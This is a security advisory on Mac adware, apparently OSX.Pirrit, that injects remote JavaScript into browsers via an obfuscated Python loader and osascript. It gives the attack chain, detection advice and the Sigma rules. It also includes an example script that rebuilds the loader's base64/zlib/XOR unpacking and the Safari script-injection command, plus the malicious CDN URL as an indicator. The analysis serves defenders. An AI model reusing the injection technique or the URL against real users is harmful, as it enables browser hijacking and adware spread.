Threat Feed
medium advisory

Mac Adware Injecting Malicious JavaScript via Obfuscated Python Script

This Mac adware sample, likely a component of OSX.Pirrit, stacks several layers of obfuscation (a compiled Python loader, base64 encoding, zlib compression and variable renaming) to evade detection, then injects malicious JavaScript fetched from hxxps://1049434604.rsc.cdn77.org/ij1.min.js into the user's browser.

This brief details the analysis of a persistent Mac adware sample, potentially a component of the OSX.Pirrit family, first brought to light by Paul Taykalo of MacPaw. The adware employs multiple layers of obfuscation, including compiled Python bytecode, base64 encoding, zlib compression, and variable renaming, to evade signature-based antivirus detection; at the time of analysis the VtZkT sample was undetected by most AV engines on VirusTotal. The adware persists as a user launch item that runs a shell script, which in turn executes a Python loader that ultimately injects malicious JavaScript into web pages. The analysis walks through the steps used to deobfuscate the loader and recover its functionality, including the URL from which it downloads the malicious JavaScript: hxxps://1049434604.rsc.cdn77.org/ij1.min.js.

Attack Chain

  1. The adware is likely installed via shareware installers or trojanized applications, such as fake Adobe Flash installers.
  2. A bash script (CqfeP) is persisted as a launch item so the adware starts automatically each time the user logs in to the Mac.
  3. The bash script changes directory to /Users/<user>/Library/search.amp.
  4. The bash script executes a compiled Python script (5mLen) with an f= argument naming a second file (6bLJC).
  5. The 5mLen loader decodes and decompresses the contents of 6bLJC (base64 encoded, zlib compressed and XORed data), yielding a script template.
  6. The loader replaces the template's placeholders (pid_REPLACE, script_to_inject_REPLACE and MID_REPLACE) with a PID flag, the URL hxxps://1049434604.rsc.cdn77.org/ij1.min.js, and a machine identifier.
  7. The loader runs the resulting script via osascript, which injects the remote JavaScript into the current user's web browser.
  8. The injected JavaScript likely displays advertisements or redirects user traffic for the operator's benefit.
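The decode-and-substitute sequence in steps 5 to 7 is the part an analyst has to reproduce by hand, so here is an added example that emulates it. This is illustrative code written for this brief, not the adware's own loader and not the Objective-See analysis tooling: the layer order (XOR, then zlib, then base64), the XOR key, the script text and the substituted values are all assumptions; only the placeholder names and the download URL come from the page.

```python
import base64
import re
import zlib

# Added example, not the adware's own code: emulates the layered packing the
# brief describes (XOR, zlib, base64) on a constructed stand-in for 6bLJC.
# The layer order, the XOR key and the script text below are assumptions.
XOR_KEY = b"k3y"

# Constructed template carrying the same placeholder names the brief lists.
TEMPLATE = (
    'tell application "Safari" to do JavaScript '
    '"var s=document.createElement(\'script\');'
    "s.src='script_to_inject_REPLACE?pid=pid_REPLACE&mid=MID_REPLACE';"
    'document.head.appendChild(s);" in current tab of window 1'
)


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; applying it twice with the same key is the identity."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def pack(plain: str, key: bytes = XOR_KEY) -> bytes:
    """XOR -> zlib -> base64, producing the stand-in payload file contents."""
    return base64.b64encode(zlib.compress(xor_bytes(plain.encode(), key)))


def unpack(blob: bytes, key: bytes = XOR_KEY) -> str:
    """Peel the layers in reverse order: base64 -> zlib -> XOR."""
    raw = base64.b64decode(blob, validate=True)
    if raw[:1] != b"\x78":  # zlib stream header; stop rather than guess further
        raise ValueError("not a zlib stream after the base64 layer")
    return xor_bytes(zlib.decompress(raw), key).decode()


def find_placeholders(script: str) -> list:
    """List *_REPLACE tokens in order of first appearance: the injection points."""
    return list(dict.fromkeys(re.findall(r"\b\w+_REPLACE\b", script)))


def fill_placeholders(script: str, values: dict) -> str:
    """Substitute each placeholder, longest names first so one name is never
    rewritten inside a longer one that contains it."""
    for name in sorted(values, key=len, reverse=True):
        script = script.replace(name, values[name])
    return script


def build_argv(script: str) -> list:
    """argv the loader would hand to osascript; this is the process_creation
    event a detection rule gets to see."""
    return ["osascript", "-e", script]


SAMPLE_BLOB = pack(TEMPLATE)  # constructed stand-in for the on-disk 6bLJC file

if __name__ == "__main__":
    decoded = unpack(SAMPLE_BLOB)
    print("placeholders:", find_placeholders(decoded))
    final = fill_placeholders(decoded, {
        "pid_REPLACE": "1",                                     # assumed PID flag value
        "script_to_inject_REPLACE": "hxxps://1049434604.rsc.cdn77.org/ij1.min.js",
        "MID_REPLACE": "0123456789abcdef",                      # assumed machine id
    })
    print(build_argv(final))
```

Against a real sample the key and the layer order come from reading the loader, not from guessing; the zlib header check in `unpack` is there so a wrong assumption fails loudly instead of producing garbage that looks decoded.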

Impact

The adware injects attacker-controlled JavaScript into the user's browser sessions, potentially leading to unwanted advertisements, browser redirects, data theft, or other malicious activity. The exact scope of the campaign is unknown, but the layered obfuscation shows a deliberate effort to evade detection, and because the injected script is fetched from a remote CDN host at run time, its behavior can be changed by the operator without touching the files persisted on the Mac. The injected JavaScript degrades the user experience and can serve as a stepping stone to further malware infections.

Recommendation

  • Monitor for the execution of osascript with suspicious arguments, specifically those indicative of injected JavaScript, using the Sigma rule "Detect JavaScript Injection via osascript".
  • Block network connections to the hostname 1049434604.rsc.cdn77.org at the firewall or DNS resolver based on the IOC identified in this brief. Block only that hostname: rsc.cdn77.org is a shared CDN domain, and blocking the parent domain will break legitimate sites.
  • Monitor for the creation and execution of files within the ~/Library/search.amp directory.
  • Inspect shell scripts executed from user LaunchAgents for suspicious Python invocations, in particular a python interpreter launched from a ~/Library subdirectory.

Detection coverage (2 rules)

Detect JavaScript Injection via osascript

Level: high

Detects the execution of osascript with arguments indicative of JavaScript injection.

Format: sigma. Tactics: execution. Techniques: T1059.004. Log sources: process_creation, macos.

Detect Adware Python Script Execution from Library

Level: medium

Detects execution of Python scripts from user Library folders, often used for adware persistence.

Format: sigma. Tactics: execution, persistence. Log sources: process_creation, macos.
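To show what the two rules above actually key on, and the caveat from the Recommendation section that the loader is launched with a relative path after a cd into ~/Library/search.amp, here is an added example that approximates both detections in plain Python and runs them over constructed macOS process_creation events. This is not the platform's Sigma rule logic: the field names, the osascript indicator strings and the interpreter path pattern are assumptions, and the events are made up for the test.

```python
import os
import re
import shlex

# Added example, not the platform's Sigma rules. Field names follow the Sigma
# process_creation convention (Image, CommandLine, CurrentDirectory); the
# indicator strings and the path patterns below are assumptions.

# Substrings that mark an osascript invocation as running JavaScript:
# the JXA language flag and the browsers' AppleScript verbs for script injection.
JS_INDICATORS = (
    "-l javascript",        # osascript -l JavaScript (JXA)
    "do javascript",        # Safari's AppleScript verb
    "execute javascript",   # Google Chrome's AppleScript verb
)

PYTHON_IMAGE = re.compile(r"/python(\d(\.\d+)?)?$")
USER_LIBRARY = re.compile(r"^/Users/[^/]+/Library/")


def first_script_arg(command_line: str) -> str:
    """Return the first non-flag argument after argv[0], or '' if none."""
    try:
        argv = shlex.split(command_line)
    except ValueError:
        argv = command_line.split()
    for arg in argv[1:]:
        if not arg.startswith("-"):
            return arg
    return ""


def detect_osascript_js(event: dict) -> bool:
    """Rule 1: osascript whose arguments indicate JavaScript execution."""
    if not event.get("Image", "").endswith("/osascript"):
        return False
    cmd = event.get("CommandLine", "").lower()
    return any(indicator in cmd for indicator in JS_INDICATORS)


def detect_library_python(event: dict) -> bool:
    """Rule 2: a python interpreter running a script under ~/Library.
    The script path is resolved against CurrentDirectory because the adware's
    launch script cd's into ~/Library/search.amp and passes a bare filename."""
    if not PYTHON_IMAGE.search(event.get("Image", "")):
        return False
    cwd = event.get("CurrentDirectory", "")
    script = first_script_arg(event.get("CommandLine", ""))
    resolved = os.path.normpath(os.path.join(cwd, script)) if script else cwd
    return bool(USER_LIBRARY.match(resolved))


RULES = (
    ("Detect JavaScript Injection via osascript", "high", detect_osascript_js),
    ("Detect Adware Python Script Execution from Library", "medium", detect_library_python),
)


def run_rules(events: list) -> list:
    """Evaluate every rule against every event; return the hits in event order."""
    hits = []
    for index, event in enumerate(events):
        for name, level, check in RULES:
            if check(event):
                hits.append({"index": index, "rule": name, "level": level})
    return hits


# Constructed events: two modelled on the attack chain, two benign look-alikes.
EVENTS = [
    {"Image": "/usr/bin/osascript",
     "CommandLine": "osascript -e 'tell application \"Safari\" to do JavaScript "
                    "\"var s=document.createElement(\\'script\\');\" in current tab of window 1'",
     "CurrentDirectory": "/Users/alice/Library/search.amp"},
    {"Image": "/usr/bin/python",
     "CommandLine": "python 5mLen f=6bLJC",
     "CurrentDirectory": "/Users/alice/Library/search.amp"},
    {"Image": "/usr/bin/osascript",
     "CommandLine": "osascript -e 'display notification \"backup finished\"'",
     "CurrentDirectory": "/Users/alice"},
    {"Image": "/usr/local/bin/python3",
     "CommandLine": "python3 /Users/alice/src/tool.py --verbose",
     "CurrentDirectory": "/Users/alice/src"},
]

if __name__ == "__main__":
    for hit in run_rules(EVENTS):
        print(f"[{hit['level']}] event {hit['index']}: {hit['rule']}")
```

The second rule is the one that needs the CurrentDirectory join: matching only on the absolute path in CommandLine would miss the `python 5mLen f=6bLJC` invocation entirely, which is exactly how the persisted launch script runs the loader.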


Indicators of compromise (1)

Type | Value
url  | https://1049434604.rsc.cdn77.org/ij1.min.js